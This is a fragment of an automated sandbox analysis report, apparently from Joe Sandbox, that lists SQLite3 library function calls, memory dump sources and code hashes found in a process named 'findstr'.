                                                                                                      • Part of subcall function 61E351D2: sqlite3_vmprintf.SQLITE3 ref: 61E351F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2044204354-0
                                                                                                    • Opcode ID: 1c2a324c7f83091259c27be4f7c077c1804106c38e465fbed6605bf40c304583
                                                                                                    • Instruction ID: d50cf257539348e788ea68656c6546568752399a1f9c297d18f02efa7f5aea37
                                                                                                    • Opcode Fuzzy Hash: 1c2a324c7f83091259c27be4f7c077c1804106c38e465fbed6605bf40c304583
                                                                                                    • Instruction Fuzzy Hash: 2841E474E04659DBDB01DFA9C480AAEBBF5AF89315F20C92EE859D7350EB34D802CB51
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E327FF: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,61E328EE), ref: 61E3282E
                                                                                                      • Part of subcall function 61E09142: memcmp.MSVCRT ref: 61E0919C
                                                                                                      • Part of subcall function 61E09142: memcmp.MSVCRT ref: 61E09200
                                                                                                    • sqlite3_malloc64.SQLITE3 ref: 61E32D9E
                                                                                                      • Part of subcall function 61E1A7FF: sqlite3_initialize.SQLITE3 ref: 61E1A80A
                                                                                                    • memcmp.MSVCRT ref: 61E32E5E
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E32F3C
                                                                                                    • sqlite3_log.SQLITE3 ref: 61E32FED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_freesqlite3_initializesqlite3_logsqlite3_malloc64sqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 885863977-3916222277
                                                                                                    • Opcode ID: c7a47a0a3a978d7881078b673ba02d9b384dc068e8d5871ad12da2bd378eb5b1
                                                                                                    • Instruction ID: 71d31c16e7c5498feb8dac410fbecc6e3d873e5deddcbf21f14c66feeb547e20
                                                                                                    • Opcode Fuzzy Hash: c7a47a0a3a978d7881078b673ba02d9b384dc068e8d5871ad12da2bd378eb5b1
                                                                                                    • Instruction Fuzzy Hash: 90E10570E042698BDB54DFA9C98478DBBF1BF98308F208569E858EB355E774D885CF80
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E35AC1
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E35AF0
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E35B05
                                                                                                    • sqlite3_load_extension.SQLITE3 ref: 61E35B20
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E35B3B
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E35B46
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                    • String ID:
                                                                                                    • API String ID: 356667613-0
                                                                                                    • Opcode ID: dfd58dc9ebaf6256097c0e781b216f50ae032420fb48fbe3d64b8c6e8492f0c5
                                                                                                    • Instruction ID: b0cb48528066a7090ff18f65fa0e18564e6490bd08e55b1769881dbd3872592e
                                                                                                    • Opcode Fuzzy Hash: dfd58dc9ebaf6256097c0e781b216f50ae032420fb48fbe3d64b8c6e8492f0c5
                                                                                                    • Instruction Fuzzy Hash: 0F11E7B49087559BCB10EF69C48455AFBF0AF89364F20CA1DE8A987390D334D441CF51
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: invalid rootpage
                                                                                                    • API String ID: 0-1762523506
                                                                                                    • Opcode ID: bd02f04d0bc365ab9c50363e707fa58d777e2edfa58f55ef7ba3493da82e74e1
                                                                                                    • Instruction ID: 610ffb7a34ccbed7cff37b7b4ac3cd2f9bec1d9ba6192073f9528fc213e1639d
                                                                                                    • Opcode Fuzzy Hash: bd02f04d0bc365ab9c50363e707fa58d777e2edfa58f55ef7ba3493da82e74e1
                                                                                                    • Instruction Fuzzy Hash: 82416F74A843558FDB10CFA9C48075ABBF5AFC9318F64C86DE8A99B351D730E881CB91
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E31339
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E31346
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E31354
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E313EF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_result_text
                                                                                                    • String ID: i
                                                                                                    • API String ID: 380805339-3865851505
                                                                                                    • Opcode ID: 0c4ecd1fc2980fa9802c7c44043fc528dfc719f59195f5150e255adfaae1991b
                                                                                                    • Instruction ID: 34715f30302f51982403a4bd1b476040fb687576226f43a491f95d6c211fce21
                                                                                                    • Opcode Fuzzy Hash: 0c4ecd1fc2980fa9802c7c44043fc528dfc719f59195f5150e255adfaae1991b
                                                                                                    • Instruction Fuzzy Hash: 0941A074E083559BCB00DFA9D98069DFBF5AF88214F24C52EE8A8E7350D774D841CB52
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E380D1
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E38126
                                                                                                      • Part of subcall function 61E37F9A: sqlite3_mprintf.SQLITE3 ref: 61E37FEC
                                                                                                      • Part of subcall function 61E37F9A: sqlite3_result_error.SQLITE3 ref: 61E38006
                                                                                                      • Part of subcall function 61E37F9A: sqlite3_free.SQLITE3 ref: 61E3800E
                                                                                                    • sqlite3_result_subtype.SQLITE3 ref: 61E381C5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_subtype
                                                                                                    • String ID: J$null
                                                                                                    • API String ID: 321809972-802103870
                                                                                                    • Opcode ID: 8f465e050b62c10482d958cf4a42babe55b75c73d7f44fb8f784198fc46bdb8c
                                                                                                    • Instruction ID: 22facf348c86821ebe9090002c041957e1e719a4f5c105b548af362badf8ae58
                                                                                                    • Opcode Fuzzy Hash: 8f465e050b62c10482d958cf4a42babe55b75c73d7f44fb8f784198fc46bdb8c
                                                                                                    • Instruction Fuzzy Hash: B1313D70A0426A9BDB10DF24C881B9EB7E1AFC5358F24C169E848DB341D735DA86CF81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                    • String ID: la
                                                                                                    • API String ID: 3596987688-1065728030
                                                                                                    • Opcode ID: 7241eb905d1dfc9d99ee330e2cd5261d2686ae0a93b4515562b17ef3480060b3
                                                                                                    • Instruction ID: 01224ce401ee1e953deddca4b5bd68c535d711521b6eb2c53789093390a6bd60
                                                                                                    • Opcode Fuzzy Hash: 7241eb905d1dfc9d99ee330e2cd5261d2686ae0a93b4515562b17ef3480060b3
                                                                                                    • Instruction Fuzzy Hash: 0B31D3B1A087469FC700DF69C88169EBBE0AF88364F24C92EE4A9D7350D778D9418F91
                                                                                                    APIs
                                                                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E23581
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E23619
                                                                                                    • sqlite3_snprintf.SQLITE3 ref: 61E23639
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E23641
                                                                                                      • Part of subcall function 61E1280D: sqlite3_free.SQLITE3 ref: 61E128B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                    • String ID: a
                                                                                                    • API String ID: 4082161338-581836851
                                                                                                    • Opcode ID: fdb5e16049fc0b7c61876ddb340f192f6da7ef1442bedf23081475d568416464
                                                                                                    • Instruction ID: b9e181d239d4676d816906141708db1cd7c2a9d3d6bc185cdad488ee15cd9f1c
                                                                                                    • Opcode Fuzzy Hash: fdb5e16049fc0b7c61876ddb340f192f6da7ef1442bedf23081475d568416464
                                                                                                    • Instruction Fuzzy Hash: 9231AEB49083469FDB00EFA9D49474EBBF4BB89748F20C82EE89897340D778C5458F92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strglob
                                                                                                    • String ID: $
                                                                                                    • API String ID: 476814121-227171996
                                                                                                    • Opcode ID: d45859bd94aa7d7c435b7c67a8cddfe6e377d919fc8bbdac0b6288aa45c96c6f
                                                                                                    • Instruction ID: 35265239b59b55e4c7ac4d32140c5f1fbc0c98f44576d73b02f3c0820d6b2da3
                                                                                                    • Opcode Fuzzy Hash: d45859bd94aa7d7c435b7c67a8cddfe6e377d919fc8bbdac0b6288aa45c96c6f
                                                                                                    • Instruction Fuzzy Hash: DA214878C0838289D7198BBAD4C075ABFE4FF87319F34D5AEC4958A291EB30C461C742
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E191C6
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E1920E
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E19235
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19263
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                    • String ID: a
                                                                                                    • API String ID: 2308590742-581836851
                                                                                                    • Opcode ID: a8e8039b9c4c19759a624d263a5bd64fc13c73cf6fa9d51dae6ad896e830a499
                                                                                                    • Instruction ID: cc82e61c603c8a5912f050e6c8823d03383f9d68c91f2670f3544d1c55b0dd5a
                                                                                                    • Opcode Fuzzy Hash: a8e8039b9c4c19759a624d263a5bd64fc13c73cf6fa9d51dae6ad896e830a499
                                                                                                    • Instruction Fuzzy Hash: C121C670A0C2418BEB11CEA9A4427DB7BE9DFCAB18F35C468DC9887349D775D442C751
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1F1C3
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E1F1F3
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F209
                                                                                                    • sqlite3_result_int64.SQLITE3 ref: 61E1F221
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                    • String ID: &a
                                                                                                    • API String ID: 3779139978-2279106107
                                                                                                    • Opcode ID: a7a9d91952da6402b3fc85eb929c098bc9ff5ecb2112afc8fda0e437c74666b0
                                                                                                    • Instruction ID: c7a8ec0e42bf90dd108108ea8e43c42187e1bfdf7df822401585adc389347608
                                                                                                    • Opcode Fuzzy Hash: a7a9d91952da6402b3fc85eb929c098bc9ff5ecb2112afc8fda0e437c74666b0
                                                                                                    • Instruction Fuzzy Hash: FA019EB540C7419FD7109F14E486759BFE0AB85B18F22C99DE4990B2A6D338C488C782
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19A46
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E19ADC
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19A0D
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19C6B
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 165182205-0
                                                                                                    • Opcode ID: 0dc32382279109aa12175900852946e1a0375cd8d9686ae5bc1d385b4f56fe90
                                                                                                    • Instruction ID: c404fbe333b87a22cba2c581d9808334469befb54c511682955e2ce2a3c4d7c2
                                                                                                    • Opcode Fuzzy Hash: 0dc32382279109aa12175900852946e1a0375cd8d9686ae5bc1d385b4f56fe90
                                                                                                    • Instruction Fuzzy Hash: AAA1A075D05218DBDF04CFA9D480A8DBBF1BF88314F21852AE859AB358E774A946CF80
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E508DC), ref: 61E5065A
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E508DC), ref: 61E507E7
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E508DC), ref: 61E507F9
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50810
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50818
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2921195555-0
                                                                                                    • Opcode ID: d2e484fd3ae75c4034c326f8de4880375a5f328d399ffd7917b498590bb34918
                                                                                                    • Instruction ID: c0aea3a93d8ea2144fc0c2d72865e1cbea41ab2a26ae63e281b9eb9a07cbb3c9
                                                                                                    • Opcode Fuzzy Hash: d2e484fd3ae75c4034c326f8de4880375a5f328d399ffd7917b498590bb34918
                                                                                                    • Instruction Fuzzy Hash: D35148756006428BDB50EFB9C88064AB7B1BF8431CF35C56DEC999B305D739E866CBA0
                                                                                                    APIs
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 4073198082-0
                                                                                                    • Opcode ID: 85f9659fb58b2002a1f5570c31170a7c917a875ab17f1a4ec794fc138f2df255
                                                                                                    • Instruction ID: ca131e19b67b6c75f475db37494c9ada67695e5add3c8d38a458df3fb20179ad
                                                                                                    • Opcode Fuzzy Hash: 85f9659fb58b2002a1f5570c31170a7c917a875ab17f1a4ec794fc138f2df255
                                                                                                    • Instruction Fuzzy Hash: D54159B0A04225CFDB08CF64C48465ABBF1FF88318F29C569E8558B345E735E951CFA1
                                                                                                    APIs
                                                                                                    • sqlite3_result_null.SQLITE3 ref: 61E33C97
                                                                                                    • sqlite3_result_int.SQLITE3 ref: 61E33CB6
                                                                                                    • sqlite3_result_int64.SQLITE3 ref: 61E33D6B
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E33D9F
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E33DDC
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E33E85
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 402655203-0
                                                                                                    • Opcode ID: 91c2404dca215de2b219005469dbc2cdeedba4c19bacde79836a5b08faf5f1d1
                                                                                                    • Instruction ID: 88aa2cc9e7bf0b379d4d2f090e7787d9a3c08766b2e86d95f3e28b8903ae6b59
                                                                                                    • Opcode Fuzzy Hash: 91c2404dca215de2b219005469dbc2cdeedba4c19bacde79836a5b08faf5f1d1
                                                                                                    • Instruction Fuzzy Hash: CE416DB4D093A49ECB10DFACC098A9DBBF2ABC9354F65C91EE4949B345C335C881CB12
                                                                                                    APIs
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E35CC1
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E35D7C
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E35D8A
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E35DAC
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E35DBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 2195261611-0
                                                                                                    • Opcode ID: d9ac8b4d6d2e7914a929f73aee334b3f69a00112fd8b9810b17f034bc3d650c0
                                                                                                    • Instruction ID: 84c3bc485ae28b15cea9a4d63c3cad7be0fdb9987c99e3a16db8258184c408df
                                                                                                    • Opcode Fuzzy Hash: d9ac8b4d6d2e7914a929f73aee334b3f69a00112fd8b9810b17f034bc3d650c0
                                                                                                    • Instruction Fuzzy Hash: 4D311271E09A69DADF017F81D5881DEBBB0FF88704F658809E88166314E739CC92CB82
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E134FC: sqlite3_mutex_try.SQLITE3(?,?,?,61E1357C), ref: 61E1349C
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E50583
                                                                                                    • sqlite3_mutex_free.SQLITE3 ref: 61E505C4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E505D4
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50603
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50622
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 1894464702-0
                                                                                                    • Opcode ID: 960ea10271d4fc203d312e5772627d47ad9ad2b08addd12fa90b59a3ae0e68fd
                                                                                                    • Instruction ID: d7f499f12f0180ccd69ae3c2ed0b77737b747c9e29f576d97867e0430118c7ff
                                                                                                    • Opcode Fuzzy Hash: 960ea10271d4fc203d312e5772627d47ad9ad2b08addd12fa90b59a3ae0e68fd
                                                                                                    • Instruction Fuzzy Hash: B2314D34B046428BD764DF69C4C061ABBF6AFC534CB78C569E845CB319E732E892CB81
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E1CF5C
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • memcmp.MSVCRT ref: 61E1CFCE
                                                                                                    • memcmp.MSVCRT ref: 61E1CFF3
                                                                                                    • memcmp.MSVCRT ref: 61E1D024
                                                                                                    • memcmp.MSVCRT ref: 61E1D050
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 40721531-0
                                                                                                    • Opcode ID: 9e3f36c4c0fabc8e188632fe39f854cff41fe50b8323668d134924b1423a07d0
                                                                                                    • Instruction ID: 10124974f9cd055ed393cdc156a8556424f59d13ec397e0d7a61010eb49106af
